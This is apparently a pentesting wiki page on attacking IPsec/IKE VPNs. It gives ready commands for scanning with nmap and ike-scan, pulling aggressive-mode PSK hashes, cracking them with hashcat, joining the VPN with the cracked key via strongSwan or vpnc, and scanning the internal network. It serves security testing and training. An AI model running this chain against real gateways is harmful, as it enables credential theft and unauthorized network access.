Pentesting IPsec/IKE

Ports: UDP 500 (IKE), UDP 4500 (NAT-T IKE)

IPsec VPNs use Internet Key Exchange (IKE) for establishing secure tunnels. Misconfigurations can leak PSK hashes.

Discovery

# UDP scan for IKE
nmap -sU -p 500,4500 $ip

# Service version
nmap -sU -p 500 -sV $ip

ike-scan

Primary tool for IKE enumeration and attacks.

# Install
sudo apt install ike-scan

Basic Enumeration

# Check if IKE is running (Main Mode)
ike-scan -M $ip

Output interpretation:

Result

Meaning

1 returned handshake; 0 returned notify

Target is IPsec gateway, willing to negotiate

0 returned handshake; 1 returned notify

None of proposed transforms acceptable

0 returned handshake; 0 returned notify

Not an IPsec gateway

Vendor Identification

# Fingerprint vendor via backoff timing
ike-scan -M --showbackoff $ip

Aggressive Mode Attack (PSK Extraction)

Aggressive mode is vulnerable - it returns a hash that can be cracked offline.

# Aggressive mode with fake ID (extracts hash if server responds)
ike-scan -P -M -A -n fakeID $ip

Key output to look for:

ID(Type=ID_USER_FQDN, Value=...) - reveals server's group name/ID
Hash(20 bytes) - the PSK hash for cracking

Full PSK Hash Extraction

ike-scan -P -M -A -n fakeID $ip

The output contains IKE PSK parameters in this format:

g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r

Save the entire parameter string to a file for cracking.

Note on Fake Hashes

If a hash is returned even with a fake ID, the server may be sending fake hashes for any ID (security feature). However, if it cracks successfully, the hash was real.

Cracking IKE-PSK Hash

# Identify hash type
hashcat --identify hash.txt
# Output: 5400 | IKE-PSK SHA1

# Crack with rockyou
hashcat -a 0 -m 5400 hash.txt /usr/share/wordlists/rockyou.txt

# MD5 variant
hashcat -a 0 -m 5300 hash.txt /usr/share/wordlists/rockyou.txt

Hashcat IKE Modes

Mode

Description

5300

IKE-PSK MD5

5400

IKE-PSK SHA1

Transform Enumeration

If default transforms fail, enumerate acceptable ones:

# Try different encryption/hash combos
ike-scan -M --trans=5,2,1,2 $ip  # 3DES, SHA1, MODP1024, PSK
ike-scan -M --trans=7,2,1,2 $ip  # AES-128, SHA1, MODP1024, PSK
ike-scan -M --trans=7/256,2,1,2 $ip  # AES-256

Transform Format

--trans=enc,hash,auth,group

Encryption

Hash

Auth

Group

5 = 3DES

1 = MD5

1 = PSK

1 = MODP768

7 = AES

2 = SHA1

2 = RSA

2 = MODP1024

64221 = XAUTH

5 = MODP1536

Connecting to VPN

Once you have credentials:

StrongSwan

# Install
sudo apt install strongswan

# Config files
/etc/ipsec.conf
/etc/ipsec.secrets

Example /etc/ipsec.secrets:

%any : PSK "cracked_password_here"

vpnc

sudo apt install vpnc

# Create config
sudo vim /etc/vpnc/vpn.conf

Example config:

IPSec gateway TARGET_IP
IPSec ID group_name
IPSec secret cracked_psk
Xauth username username_here
Xauth password password_here

Connect:

sudo vpnc /etc/vpnc/vpn.conf

Post-Connection

After VPN connection:

# Check new interface
ip addr

# Re-scan internal network
nmap -sC -sV TARGET_INTERNAL_IP

References

https://book.hacktricks.xyz/network-services-pentesting/ipsec-ike-vpn-pentesting
ike-scan documentation

PreviousPentesting TFTP NextPentesting NFS

Last updated 4 days ago

hashtagDiscovery

hashtagike-scan

hashtagBasic Enumeration

hashtagVendor Identification

hashtagAggressive Mode Attack (PSK Extraction)

hashtagFull PSK Hash Extraction

hashtagNote on Fake Hashes

hashtagCracking IKE-PSK Hash

hashtagHashcat IKE Modes

hashtagTransform Enumeration

hashtagTransform Format

hashtagConnecting to VPN

hashtagStrongSwan

hashtagvpnc

hashtagPost-Connection

hashtagReferences